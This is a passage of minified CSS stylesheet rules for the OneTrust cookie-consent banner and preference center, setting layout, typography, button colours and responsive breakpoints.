ease}#ot-sdk-btn.ot-sdk-show-settings:hover,#ot-sdk-btn.optanon-show-settings:hover{color:#fff;background-color:#68b631}.onetrust-pc-dark-filter{background:rgba(0,0,0,.5);z-index:2147483646;width:100%;height:100%;overflow:hidden;position:fixed;top:0;bottom:0;left:0}@keyframes onetrust-fade-in{0%{opacity:0}100%{opacity:1}}.ot-cookie-label{text-decoration:underline}@media only screen and (min-width:426px)and (max-width:896px)and (orientation:landscape){#onetrust-pc-sdk p{font-size:.75em}}#onetrust-banner-sdk .banner-option-input:focus+label{outline:1px solid #000;outline-style:auto}.category-vendors-list-handler+a:focus,.category-vendors-list-handler+a:focus-visible{outline:2px solid #000}#onetrust-pc-sdk .ot-userid-title{margin-top:10px}#onetrust-pc-sdk .ot-userid-title>span,#onetrust-pc-sdk .ot-userid-timestamp>span{font-weight:700}#onetrust-pc-sdk .ot-userid-desc{font-style:italic}#onetrust-pc-sdk .ot-host-desc a{pointer-events:initial}#onetrust-pc-sdk .ot-ven-hdr>p a{position:relative;z-index:2;pointer-events:initial}#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info a,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-vnd-info a{margin-right:auto}#onetrust-pc-sdk .ot-pc-footer-logo img{width:136px;height:16px}#onetrust-pc-sdk .ot-pur-vdr-count{font-weight:400;font-size:.7rem;padding-top:3px;display:block}#onetrust-banner-sdk .ot-optout-signal,#onetrust-pc-sdk .ot-optout-signal{border:1px solid #32ae88;border-radius:3px;padding:5px;margin-bottom:10px;background-color:#f9fffa;font-size:.85rem;line-height:2}#onetrust-banner-sdk .ot-optout-signal .ot-optout-icon,#onetrust-pc-sdk .ot-optout-signal .ot-optout-icon{display:inline;margin-right:5px}#onetrust-banner-sdk .ot-optout-signal svg,#onetrust-pc-sdk .ot-optout-signal svg{height:20px;width:30px;transform:scale(.5)}#onetrust-banner-sdk .ot-optout-signal svg path,#onetrust-pc-sdk .ot-optout-signal svg path{fill:#32ae88}#onetrust-consent-sdk .ot-general-modal{overflow:hidden;position:fixed;margin:0 auto;top:50%;left:50%;width:40%;padding:1.5rem;max-width:575px;min-width:575px;z-index:2147483647;border-radius:2.5px;transform:translate(-50%,-50%)}#onetrust-consent-sdk .ot-signature-health-group{margin-top:1rem;padding-left:1.25rem;padding-right:1.25rem;margin-bottom:.625rem;width:calc(100% - 2.5rem)}#onetrust-consent-sdk .ot-signature-health-group .ot-signature-health-form{gap:.5rem}#onetrust-consent-sdk .ot-signature-health .ot-signature-health-form{width:70%;gap:.35rem}#onetrust-consent-sdk .ot-signature-health .ot-signature-input{height:38px;padding:6px 10px;background-color:#fff;border:1px solid #d1d1d1;border-radius:4px;box-shadow:none;box-sizing:border-box}#onetrust-consent-sdk .ot-signature-health .ot-signature-subtitle{font-size:1.125rem}#onetrust-consent-sdk .ot-signature-health .ot-signature-group-title{font-size:1.25rem;font-weight:700}#onetrust-consent-sdk .ot-signature-health,#onetrust-consent-sdk .ot-signature-health-group{display:flex;flex-direction:column;gap:1rem}#onetrust-consent-sdk .ot-signature-health .ot-signature-cont,#onetrust-consent-sdk .ot-signature-health-group .ot-signature-cont{display:flex;flex-direction:column;gap:.25rem}#onetrust-consent-sdk .ot-signature-health .ot-signature-paragraph,#onetrust-consent-sdk .ot-signature-health-group .ot-signature-paragraph{margin:0;line-height:20px;font-size:max(14px,.875rem)}#onetrust-consent-sdk .ot-signature-health .ot-health-signature-error,#onetrust-consent-sdk .ot-signature-health-group .ot-health-signature-error{color:#4d4d4d;font-size:min(12px,.75rem)}#onetrust-consent-sdk .ot-signature-health .ot-signature-buttons-cont,#onetrust-consent-sdk .ot-signature-health-group .ot-signature-buttons-cont{margin-top:max(.75rem,2%);gap:1rem;display:flex;justify-content:flex-end}#onetrust-consent-sdk .ot-signature-health .ot-signature-button,#onetrust-consent-sdk .ot-signature-health-group .ot-signature-button{flex:1;height:auto;color:#fff;cursor:pointer;line-height:1.2;min-width:125px;font-weight:600;font-size:.813em;border-radius:2px;padding:12px 10px;white-space:normal;word-wrap:break-word;word-break:break-word;background-color:#68b631;border:2px solid #68b631}#onetrust-consent-sdk .ot-signature-health .ot-signature-button.reject,#onetrust-consent-sdk .ot-signature-health-group .ot-signature-button.reject{background-color:#fff}#onetrust-consent-sdk .ot-input-field-cont{display:flex;flex-direction:column;gap:.5rem}#onetrust-consent-sdk .ot-input-field-cont .ot-signature-input{width:65%}#onetrust-consent-sdk .ot-signature-health-form{display:flex;flex-direction:column}#onetrust-consent-sdk .ot-signature-health-form .ot-signature-label{margin-bottom:0;line-height:20px;font-size:max(14px,.875rem)}@media only screen and (max-width:600px){#onetrust-consent-sdk .ot-general-modal{min-width:100%}#onetrust-consent-sdk .ot-signature-health .ot-signature-health-form{width:100%}#onetrust-consent-sdk .ot-input-field-cont .ot-signature-input{width:100%}}#onetrust-banner-sdk,#onetrust-pc-sdk,#ot-sdk-cookie-policy,#ot-sync-ntfy{font-size:16px}#onetrust-banner-sdk *,#onetrust-banner-sdk ::after,#onetrust-banner-sdk ::before,#onetrust-pc-sdk *,#onetrust-pc-sdk ::after,#onetrust-pc-sdk ::before,#ot-sdk-cookie-policy *,#ot-sdk-cookie-policy ::after,#ot-sdk-cookie-policy ::before,#ot-sync-ntfy *,#ot-sync-ntfy ::after,#ot-sync-ntfy ::before{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}#onetrust-banner-sdk div,#onetrust-banner-sdk span,#onetrust-banner-sdk h1,#onetrust-banner-sdk h2,#onetrust-banner-sdk h3,#onetrust-banner-sdk h4,#onetrust-banner-sdk h5,#onetrust-banner-sdk h6,#onetrust-banner-sdk p,#onetrust-banner-sdk img,#onetrust-banner-sdk svg,#onetrust-banner-sdk button,#onetrust-banner-sdk section,#onetrust-banner-sdk a,#onetrust-banner-sdk label,#onetrust-banner-sdk input,#onetrust-banner-sdk ul,#onetrust-banner-sdk li,#onetrust-banner-sdk nav,#onetrust-banner-sdk table,#onetrust-banner-sdk thead,#onetrust-banner-sdk tr,#onetrust-banner-sdk td,#onetrust-banner-sdk tbody,#onetrust-banner-sdk .ot-main-content,#onetrust-banner-sdk .ot-toggle,#onetrust-banner-sdk #ot-content,#onetrust-banner-sdk #ot-pc-content,#onetrust-banner-sdk .checkbox,#onetrust-pc-sdk div,#onetrust-pc-sdk span,#onetrust-pc-sdk h1,#onetrust-pc-sdk h2,#onetrust-pc-sdk h3,#onetrust-pc-sdk h4,#onetrust-pc-sdk h5,#onetrust-pc-sdk h6,#onetrust-pc-sdk p,#onetrust-pc-sdk img,#onetrust-pc-sdk svg,#onetrust-pc-sdk button,#onetrust-pc-sdk section,#onetrust-pc-sdk a,#onetrust-pc-sdk label,#onetrust-pc-sdk input,#onetrust-pc-sdk ul,#onetrust-pc-sdk li,#onetrust-pc-sdk nav,#onetrust-pc-sdk table,#onetrust-pc-sdk thead,#onetrust-pc-sdk tr,#onetrust-pc-sdk td,#onetrust-pc-sdk tbody,#onetrust-pc-sdk .ot-main-content,#onetrust-pc-sdk .ot-toggle,#onetrust-pc-sdk #ot-content,#onetrust-pc-sdk #ot-pc-content,#onetrust-pc-sdk .checkbox,#ot-sdk-cookie-policy div,#ot-sdk-cookie-policy span,#ot-sdk-cookie-policy h1,#ot-sdk-cookie-policy h2,#ot-sdk-cookie-policy h3,#ot-sdk-cookie-policy h4,#ot-sdk-cookie-policy h5,#ot-sdk-cookie-policy h6,#ot-sdk-cookie-policy p,#ot-sdk-cookie-policy img,#ot-sdk-cookie-policy svg,#ot-sdk-cookie-policy button,#ot-sdk-cookie-policy section,#ot-sdk-cookie-policy a,#ot-sdk-cookie-policy label,#ot-sdk-cookie-policy input,#ot-sdk-cookie-policy ul,#ot-sdk-cookie-policy li,#ot-sdk-cookie-policy nav,#ot-sdk-cookie-policy table,#ot-sdk-cookie-policy thead,#ot-sdk-cookie-policy tr,#ot-sdk-cookie-policy td,#ot-sdk-cookie-policy tbody,#ot-sdk-cookie-policy .ot-main-content,#ot-sdk-cookie-policy .ot-toggle,#ot-sdk-cookie-policy #ot-content,#ot-sdk-cookie-policy #ot-pc-content,#ot-sdk-cookie-policy .checkbox,#ot-sync-ntfy div,#ot-sync-ntfy span,#ot-sync-ntfy h1,#ot-sync-ntfy h2,#ot-sync-ntfy h3,#ot-sync-ntfy h4,#ot-sync-ntfy h5,#ot-sync-ntfy h6,#ot-sync-ntfy p,#ot-sync-ntfy img,#ot-sync-ntfy svg,#ot-sync-ntfy button,#ot-sync-ntfy section,#ot-sync-ntfy a,#ot-sync-ntfy label,#ot-sync-ntfy input,#ot-sync-ntfy ul,#ot-sync-ntfy li,#ot-sync-ntfy nav,#ot-sync-ntfy table,#ot-sync-ntfy thead,#ot-sync-ntfy tr,#ot-sync-ntfy td,#ot-sync-ntfy tbody,#ot-sync-ntfy .ot-main-content,#ot-sync-ntfy .ot-toggle,#ot-sync-ntfy #ot-content,#ot-sync-ntfy #ot-pc-content,#ot-sync-ntfy .checkbox{font-family:inherit;font-weight:400;-webkit-font-smoothing:auto;letter-spacing:normal;line-height:normal;padding:0;margin:0;height:auto;min-height:0;max-height:none;width:auto;min-width:0;max-width:none;border-radius:0;border:none;clear:none;float:none;position:static;bottom:auto;left:auto;right:auto;top:auto;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;white-space:normal;background:0 0;overflow:visible;vertical-align:baseline;visibility:visible;z-index:auto;box-shadow:none}#onetrust-banner-sdk label:before,#onetrust-banner-sdk label:after,#onetrust-banner-sdk .checkbox:after,#onetrust-banner-sdk .checkbox:before,#onetrust-pc-sdk label:before,#onetrust-pc-sdk label:after,#onetrust-pc-sdk .checkbox:after,#onetrust-pc-sdk .checkbox:before,#ot-sdk-cookie-policy label:before,#ot-sdk-cookie-policy label:after,#ot-sdk-cookie-policy .checkbox:after,#ot-sdk-cookie-policy .checkbox:before,#ot-sync-ntfy label:before,#ot-sync-ntfy label:after,#ot-sync-ntfy .checkbox:after,#ot-sync-ntfy .checkbox:before{content:"";content:none}#onetrust-banner-sdk .ot-sdk-container,#onetrust-pc-sdk .ot-sdk-container,#ot-sdk-cookie-policy .ot-sdk-container{position:relative;width:100%;max-width:100%;margin:0 auto;padding:0 20px;box-sizing:border-box}#onetrust-banner-sdk .ot-sdk-column,#onetrust-banner-sdk .ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-column,#onetrust-pc-sdk .ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-column,#ot-sdk-cookie-policy .ot-sdk-columns{width:100%;float:left;box-sizing:border-box;padding:0;display:initial}@media(min-width:400px){#onetrust-banner-sdk .ot-sdk-container,#onetrust-pc-sdk .ot-sdk-container,#ot-sdk-cookie-policy .ot-sdk-container{width:90%;padding:0}}@media(min-width:550px){#onetrust-banner-sdk .ot-sdk-container,#onetrust-pc-sdk .ot-sdk-container,#ot-sdk-cookie-policy .ot-sdk-container{width:100%}#onetrust-banner-sdk .ot-sdk-column,#onetrust-banner-sdk .ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-column,#onetrust-pc-sdk .ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-column,#ot-sdk-cookie-policy .ot-sdk-columns{margin-left:4%}#onetrust-banner-sdk .ot-sdk-column:first-child,#onetrust-banner-sdk .ot-sdk-columns:first-child,#onetrust-pc-sdk .ot-sdk-column:first-child,#onetrust-pc-sdk .ot-sdk-columns:first-child,#ot-sdk-cookie-policy .ot-sdk-column:first-child,#ot-sdk-cookie-policy .ot-sdk-columns:first-child{margin-left:0}#onetrust-banner-sdk .ot-sdk-two.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-two.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-two.ot-sdk-columns{width:13.3333333333%}#onetrust-banner-sdk .ot-sdk-three.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-three.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-three.ot-sdk-columns{width:22%}#onetrust-banner-sdk .ot-sdk-four.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-four.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-four.ot-sdk-columns{width:30.6666666667%}#onetrust-banner-sdk .ot-sdk-eight.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-eight.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-eight.ot-sdk-columns{width:65.3333333333%}#onetrust-banner-sdk .ot-sdk-nine.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-nine.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-nine.ot-sdk-columns{width:74%}#onetrust-banner-sdk .ot-sdk-ten.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-ten.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-ten.ot-sdk-columns{width:82.6666666667%}#onetrust-banner-sdk .ot-sdk-eleven.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-eleven.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-eleven.ot-sdk-columns{width:91.3333333333%}#onetrust-banner-sdk .ot-sdk-twelve.ot-sdk-columns,#onetrust-pc-sdk .ot-sdk-twelve.ot-sdk-columns,#ot-sdk-cookie-policy .ot-sdk-twelve.ot-sdk-columns{width:100%;margin-left:0}}#onetrust-banner-sdk h1,#onetrust-banner-sdk h2,#onetrust-banner-sdk h3,#onetrust-banner-sdk h4,#onetrust-banner-sdk h5,#onetrust-banner-sdk h6,#onetrust-pc-sdk h1,#onetrust-pc-sdk h2,#onetrust-pc-sdk h3,#onetrust-pc-sdk h4,#onetrust-pc-sdk h5,#onetrust-pc-sdk h6,#ot-sdk-cookie-policy h1,#ot-sdk-cookie-policy h2,#ot-sdk-cookie-policy h3,#ot-sdk-cookie-policy h4,#ot-sdk-cookie-policy h5,#ot-sdk-cookie-policy h6{margin-top:0;font-weight:600;font-family:inherit}#onetrust-banner-sdk h1,#onetrust-pc-sdk h1,#ot-sdk-cookie-policy h1{font-size:1.5rem;line-height:1.2}#onetrust-banner-sdk h2,#onetrust-pc-sdk h2,#ot-sdk-cookie-policy h2{font-size:1.5rem;line-height:1.25}#onetrust-banner-sdk h3,#onetrust-pc-sdk h3,#ot-sdk-cookie-policy h3{font-size:1.5rem;line-height:1.3}#onetrust-banner-sdk h4,#onetrust-pc-sdk h4,#ot-sdk-cookie-policy h4{font-size:1.5rem;line-height:1.35}#onetrust-banner-sdk h5,#onetrust-pc-sdk h5,#ot-sdk-cookie-policy h5{font-size:1.5rem;line-height:1.5}#onetrust-banner-sdk h6,#onetrust-pc-sdk h6,#ot-sdk-cookie-policy h6{font-size:1.5rem;line-height:1.6}@media(min-width:550px){#onetrust-banner-sdk h1,#onetrust-pc-sdk h1,#ot-sdk-cookie-policy h1{font-size:1.5rem}#onetrust-banner-sdk h2,#onetrust-pc-sdk h2,#ot-sdk-cookie-policy h2{font-size:1.5rem}#onetrust-banner-sdk h3,#onetrust-pc-sdk h3,#ot-sdk-cookie-policy h3{font-size:1.5rem}#onetrust-banner-sdk h4,#onetrust-pc-sdk h4,#ot-sdk-cookie-policy h4{font-size:1.5rem}#onetrust-banner-sdk h5,#onetrust-pc-sdk h5,#ot-sdk-cookie-policy h5{font-size:1.5rem}#onetrust-banner-sdk h6,#onetrust-pc-sdk h6,#ot-sdk-cookie-policy h6{font-size:1.5rem}}#onetrust-banner-sdk p,#onetrust-pc-sdk p,#ot-sdk-cookie-policy p{margin:0 0 1em;font-family:inherit;line-height:normal}#onetrust-banner-sdk a,#onetrust-pc-sdk a,#ot-sdk-cookie-policy a{color:#565656;text-decoration:underline}#onetrust-banner-sdk a:hover,#onetrust-pc-sdk a:hover,#ot-sdk-cookie-policy a:hover{color:#565656;text-decoration:none}#onetrust-banner-sdk .ot-sdk-button,#onetrust-banner-sdk button,#onetrust-pc-sdk .ot-sdk-button,#onetrust-pc-sdk button,#ot-sdk-cookie-policy .ot-sdk-button,#ot-sdk-cookie-policy button{margin-bottom:1rem;font-family:inherit}#onetrust-banner-sdk .ot-sdk-button,#onetrust-banner-sdk button,#onetrust-pc-sdk .ot-sdk-button,#onetrust-pc-sdk button,#ot-sdk-cookie-policy .ot-sdk-button,#ot-sdk-cookie-policy button{display:inline-block;height:38px;padding:0 30px;color:#555;text-align:center;font-size:.9em;font-weight:400;line-height:38px;letter-spacing:.01em;text-decoration:none;white-space:nowrap;background-color:transparent;border-radius:2px;border:1px solid #bbb;cursor:pointer;box-sizing:border-box}#onetrust-banner-sdk .ot-sdk-button:hover,#onetrust-banner-sdk :not(.ot-leg-btn-container)>button:not(.ot-link-btn):hover,#onetrust-banner-sdk :not(.ot-leg-btn-container)>button:not(.ot-link-btn):focus,#onetrust-pc-sdk .ot-sdk-button:hover,#onetrust-pc-sdk :not(.ot-leg-btn-container)>button:not(.ot-link-btn):hover,#onetrust-pc-sdk :not(.ot-leg-btn-container)>button:not(.ot-link-btn):focus,#ot-sdk-cookie-policy .ot-sdk-button:hover,#ot-sdk-cookie-policy :not(.ot-leg-btn-container)>button:not(.ot-link-btn):hover,#ot-sdk-cookie-policy :not(.ot-leg-btn-container)>button:not(.ot-link-btn):focus{color:#333;border-color:#888;opacity:.7}#onetrust-banner-sdk .ot-sdk-button:focus,#onetrust-banner-sdk :not(.ot-leg-btn-container)>button:focus,#onetrust-pc-sdk .ot-sdk-button:focus,#onetrust-pc-sdk :not(.ot-leg-btn-container)>button:focus,#ot-sdk-cookie-policy .ot-sdk-button:focus,#ot-sdk-cookie-policy :not(.ot-leg-btn-container)>button:focus{outline:2px solid #000}#onetrust-banner-sdk .ot-sdk-button.ot-sdk-button-primary,#onetrust-banner-sdk button.ot-sdk-button-primary,#onetrust-banner-sdk input[type=submit].ot-sdk-button-primary,#onetrust-banner-sdk input[type=reset].ot-sdk-button-primary,#onetrust-banner-sdk input[type=button].ot-sdk-button-primary,#onetrust-pc-sdk .ot-sdk-button.ot-sdk-button-primary,#onetrust-pc-sdk button.ot-sdk-button-primary,#onetrust-pc-sdk input[type=submit].ot-sdk-button-primary,#onetrust-pc-sdk input[type=reset].ot-sdk-button-primary,#onetrust-pc-sdk input[type=button].ot-sdk-button-primary,#ot-sdk-cookie-policy .ot-sdk-button.ot-sdk-button-primary,#ot-sdk-cookie-policy button.ot-sdk-button-primary,#ot-sdk-cookie-policy input[type=submit].ot-sdk-button-primary,#ot-sdk-cookie-policy input[type=reset].ot-sdk-button-primary,#ot-sdk-cookie-policy input[type=button].ot-sdk-button-primary{color:#fff;background-color:#33c3f0;border-color:#33c3f0}#onetrust-banner-sdk .ot-sdk-button.ot-sdk-button-primary:hover,#onetrust-banner-sdk button.ot-sdk-button-primary:hover,#onetrust-banner-sdk input[type=submit].ot-sdk-button-primary:hover,#onetrust-banner-sdk input[type=reset].ot-sdk-button-primary:hover,#onetrust-banner-sdk input[type=button].ot-sdk-button-primary:hover,#onetrust-banner-sdk .ot-sdk-button.ot-sdk-button-primary:focus,#onetrust-banner-sdk button.ot-sdk-button-primary:focus,#onetrust-banner-sdk input[type=submit].ot-sdk-button-primary:focus,#onetrust-banner-sdk input[type=reset].ot-sdk-button-primary:focus,#onetrust-banner-sdk input[type=button].ot-sdk-button-primary:focus,#onetrust-pc-sdk .ot-sdk-button.ot-sdk-button-primary:hover,#onetrust-pc-sdk button.ot-sdk-button-primary:hover,#onetrust-pc-sdk input[type=submit].ot-sdk-button-primary:hover,#onetrust-pc-sdk input[type=reset].ot-sdk-button-primary:hover,#onetrust-pc-sdk input[type=button].ot-sdk-button-primary:hover,#onetrust-pc-sdk .ot-sdk-button.ot-sdk-button-primary:focus,#onetrust-pc-sdk button.ot-sdk-button-primary:focus,#onetrust-pc-sdk input[type=submit].ot-sdk-button-primary:focus,#onetrust-pc-sdk input[type=reset].ot-sdk-button-primary:focus,#onetrust-pc-sdk input[type=button].ot-sdk-button-primary:focus,#ot-sdk-cookie-policy .ot-sdk-button.ot-sdk-button-primary:hover,#ot-sdk-cookie-policy button.ot-sdk-button-primary:hover,#ot-sdk-cookie-policy input[type=submit].ot-sdk-button-primary:hover,#ot-sdk-cookie-policy input[type=reset].ot-sdk-button-primary:hover,#ot-sdk-cookie-policy input[type=button].ot-sdk-button-primary:hover,#ot-sdk-cookie-policy .ot-sdk-button.ot-sdk-button-primary:focus,#ot-sdk-cookie-policy button.ot-sdk-button-primary:focus,#ot-sdk-cookie-policy input[type=submit].ot-sdk-button-primary:focus,#ot-sdk-cookie-policy input[type=reset].ot-sdk-button-primary:focus,#ot-sdk-cookie-policy input[type=button].ot-sdk-button-primary:focus{color:#fff;background-color:#1eaedb;border-color:#1eaedb}#onetrust-banner-sdk input[type=text],#onetrust-pc-sdk input[type=text],#ot-sdk-cookie-policy input[type=text]{height:38px;padding:6px 10px;background-color:#fff;border:1px solid #d1d1d1;border-radius:4px;box-shadow:none;box-sizing:border-box}#onetrust-banner-sdk input[type=text],#onetrust-pc-sdk input[type=text],#ot-sdk-cookie-policy input[type=text]{-webkit-appearance:none;-moz-appearance:none;appearance:none}#onetrust-banner-sdk input[type=text]:focus,#onetrust-pc-sdk input[type=text]:focus,#ot-sdk-cookie-policy input[type=text]:focus{border:1px solid #000;outline:0}#onetrust-banner-sdk label,#onetrust-pc-sdk label,#ot-sdk-cookie-policy label{display:block;margin-bottom:.5rem;font-weight:600}#onetrust-banner-sdk input[type=checkbox],#onetrust-pc-sdk input[type=checkbox],#ot-sdk-cookie-policy input[type=checkbox]{display:inline}#onetrust-banner-sdk ul,#onetrust-pc-sdk ul,#ot-sdk-cookie-policy ul{list-style:circle inside}#onetrust-banner-sdk ul,#onetrust-pc-sdk ul,#ot-sdk-cookie-policy ul{padding-left:0;margin-top:0}#onetrust-banner-sdk ul ul,#onetrust-pc-sdk ul ul,#ot-sdk-cookie-policy ul ul{margin:1.5rem 0 1.5rem 3rem;font-size:90%}#onetrust-banner-sdk li,#onetrust-pc-sdk li,#ot-sdk-cookie-policy li{margin-bottom:1rem}#onetrust-banner-sdk th,#onetrust-banner-sdk td,#onetrust-pc-sdk th,#onetrust-pc-sdk td,#ot-sdk-cookie-policy th,#ot-sdk-cookie-policy td{padding:12px 15px;text-align:left;border-bottom:1px solid #e1e1e1}#onetrust-banner-sdk button,#onetrust-pc-sdk button,#ot-sdk-cookie-policy button{margin-bottom:1rem;font-family:inherit}#onetrust-banner-sdk .ot-sdk-container:after,#onetrust-banner-sdk .ot-sdk-row:after,#onetrust-pc-sdk .ot-sdk-container:after,#onetrust-pc-sdk .ot-sdk-row:after,#ot-sdk-cookie-policy .ot-sdk-container:after,#ot-sdk-cookie-policy .ot-sdk-row:after{content:"";display:table;clear:both}#onetrust-banner-sdk .ot-sdk-row,#onetrust-pc-sdk .ot-sdk-row,#ot-sdk-cookie-policy .ot-sdk-row{margin:0;max-width:none;display:block}#onetrust-banner-sdk{box-shadow:0 0 18px rgba(0,0,0,.2)}#onetrust-banner-sdk.otFlat{position:fixed;z-index:2147483645;bottom:0;right:0;left:0;background-color:#fff;max-height:90%;overflow-x:hidden;overflow-y:auto}#onetrust-banner-sdk.otFlat.top{top:0px;bottom:auto}#onetrust-banner-sdk.otRelFont{font-size:1rem}#onetrust-banner-sdk>.ot-sdk-container{overflow:hidden}#onetrust-banner-sdk::-webkit-scrollbar{width:11px}#onetrust-banner-sdk::-webkit-scrollbar-thumb{border-radius:10px;background:#c1c1c1}#onetrust-banner-sdk{scrollbar-arrow-color:#c1c1c1;scrollbar-darkshadow-color:#c1c1c1;scrollbar-face-color:#c1c1c1;scrollbar-shadow-color:#c1c1c1}#onetrust-banner-sdk #onetrust-policy{margin:1.25em 0 .625em 2em;overflow:hidden}#onetrust-banner-sdk #onetrust-policy .ot-gv-list-handler{float:left;font-size:.82em;padding:0;margin-bottom:0;border:0;line-height:normal;height:auto;width:auto}#onetrust-banner-sdk #onetrust-policy-title{font-size:1.2em;line-height:1.3;margin-bottom:10px}#onetrust-banner-sdk #onetrust-policy-text{clear:both;text-align:left;font-size:.88em;line-height:1.4}#onetrust-banner-sdk #onetrust-policy-text *{font-size:inherit;line-height:inherit}#onetrust-banner-sdk #onetrust-policy-text a{font-weight:bold;margin-left:5px}#onetrust-banner-sdk #onetrust-policy-title,#onetrust-banner-sdk #onetrust-policy-text{color:dimgray;float:left}#onetrust-banner-sdk #onetrust-button-group-parent{min-height:1px;text-align:center}#onetrust-banner-sdk #onetrust-button-group{display:inline-block}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{background-color:#68b631;color:#fff;border-color:#68b631;margin-right:1em;min-width:125px;height:auto;white-space:normal;word-break:break-word;word-wrap:break-word;padding:12px 10px;line-height:1.2;font-size:.813em;font-weight:600}#onetrust-banner-sdk #onetrust-pc-btn-handler.cookie-setting-link{background-color:#fff;border:none;color:#68b631;text-decoration:underline;padding-left:0;padding-right:0}#onetrust-banner-sdk .onetrust-close-btn-ui{width:44px;height:44px;background-size:12px;border:none;position:relative;margin:auto;padding:0}#onetrust-banner-sdk .banner_logo{display:none}#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo{position:absolute;top:50%;transform:translateY(-50%);left:0px}#onetrust-banner-sdk.ot-bnr-w-logo #onetrust-policy{margin-left:65px}#onetrust-banner-sdk .ot-b-addl-desc{clear:both;float:left;display:block}#onetrust-banner-sdk #banner-options{float:left;display:table;margin-right:0;margin-left:1em;width:calc(100% - 1em)}#onetrust-banner-sdk .banner-option-input{cursor:pointer;width:auto;height:auto;border:none;padding:0;padding-right:3px;margin:0 0 10px;font-size:.82em;line-height:1.4}#onetrust-banner-sdk .banner-option-input *{pointer-events:none;font-size:inherit;line-height:inherit}#onetrust-banner-sdk .banner-option-input[aria-expanded=true]~.banner-option-details{display:block;height:auto}#onetrust-banner-sdk .banner-option-input[aria-expanded=true] .ot-arrow-container{transform:rotate(90deg)}#onetrust-banner-sdk .banner-option{margin-bottom:12px;margin-left:0;border:none;float:left;padding:0}#onetrust-banner-sdk .banner-option:first-child{padding-left:2px}#onetrust-banner-sdk .banner-option:not(:first-child){padding:0;border:none}#onetrust-banner-sdk .banner-option-header{cursor:pointer;display:inline-block}#onetrust-banner-sdk .banner-option-header :first-child{color:dimgray;font-weight:bold;float:left}#onetrust-banner-sdk .banner-option-header .ot-arrow-container{display:inline-block;border-top:6px solid rgba(0,0,0,0);border-bottom:6px solid rgba(0,0,0,0);border-left:6px solid dimgray;margin-left:10px;vertical-align:middle}#onetrust-banner-sdk .banner-option-details{display:none;font-size:.83em;line-height:1.5;padding:10px 0px 5px 10px;margin-right:10px;height:0px}#onetrust-banner-sdk .banner-option-details *{font-size:inherit;line-height:inherit;color:dimgray}#onetrust-banner-sdk .ot-arrow-container,#onetrust-banner-sdk .banner-option-details{transition:all 300ms ease-in 0s;-webkit-transition:all 300ms ease-in 0s;-moz-transition:all 300ms ease-in 0s;-o-transition:all 300ms ease-in 0s}#onetrust-banner-sdk .ot-dpd-container{float:left}#onetrust-banner-sdk .ot-dpd-title{margin-bottom:10px}#onetrust-banner-sdk .ot-dpd-title,#onetrust-banner-sdk .ot-dpd-desc{font-size:.88em;line-height:1.4;color:dimgray}#onetrust-banner-sdk .ot-dpd-title *,#onetrust-banner-sdk .ot-dpd-desc *{font-size:inherit;line-height:inherit}#onetrust-banner-sdk.ot-iab-2 #onetrust-policy-text *{margin-bottom:0}#onetrust-banner-sdk.ot-iab-2 .onetrust-vendors-list-handler{display:block;margin-left:0;margin-top:5px;clear:both;margin-bottom:0;padding:0;border:0;height:auto;width:auto}#onetrust-banner-sdk.ot-iab-2 #onetrust-button-group button{display:block}#onetrust-banner-sdk.ot-close-btn-link{padding-top:25px}#onetrust-banner-sdk.ot-close-btn-link #onetrust-close-btn-container{top:15px;transform:none;right:15px}#onetrust-banner-sdk.ot-close-btn-link #onetrust-close-btn-container button{padding:0;white-space:pre-wrap;border:none;height:auto;line-height:1.5;text-decoration:underline;font-size:.69em}#onetrust-banner-sdk #onetrust-policy-text,#onetrust-banner-sdk .ot-dpd-desc,#onetrust-banner-sdk .ot-b-addl-desc{font-size:.813em;line-height:1.5}#onetrust-banner-sdk .ot-dpd-desc{margin-bottom:10px}#onetrust-banner-sdk .ot-dpd-desc>.ot-b-addl-desc{margin-top:10px;margin-bottom:10px;font-size:1em}@media only screen and (max-width: 425px){#onetrust-banner-sdk #onetrust-close-btn-container{position:absolute;top:6px;right:2px}#onetrust-banner-sdk #onetrust-policy{margin-left:0;margin-top:3em}#onetrust-banner-sdk #onetrust-button-group{display:block}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{width:100%}#onetrust-banner-sdk .onetrust-close-btn-ui{top:auto;transform:none}#onetrust-banner-sdk #onetrust-policy-title{display:inline;float:none}#onetrust-banner-sdk #banner-options{margin:0;padding:0;width:100%}}@media only screen and (min-width: 426px)and (max-width: 896px){#onetrust-banner-sdk #onetrust-close-btn-container{position:absolute;top:0;right:0}#onetrust-banner-sdk #onetrust-policy{margin-left:1em;margin-right:1em}#onetrust-banner-sdk .onetrust-close-btn-ui{top:10px;right:10px}#onetrust-banner-sdk:not(.ot-iab-2) #onetrust-group-container{width:95%}#onetrust-banner-sdk.ot-iab-2 #onetrust-group-container{width:100%}#onetrust-banner-sdk.ot-bnr-w-logo #onetrust-button-group-parent{padding-left:50px}#onetrust-banner-sdk #onetrust-button-group-parent{width:100%;position:relative;margin-left:0}#onetrust-banner-sdk #onetrust-button-group button{display:inline-block}#onetrust-banner-sdk 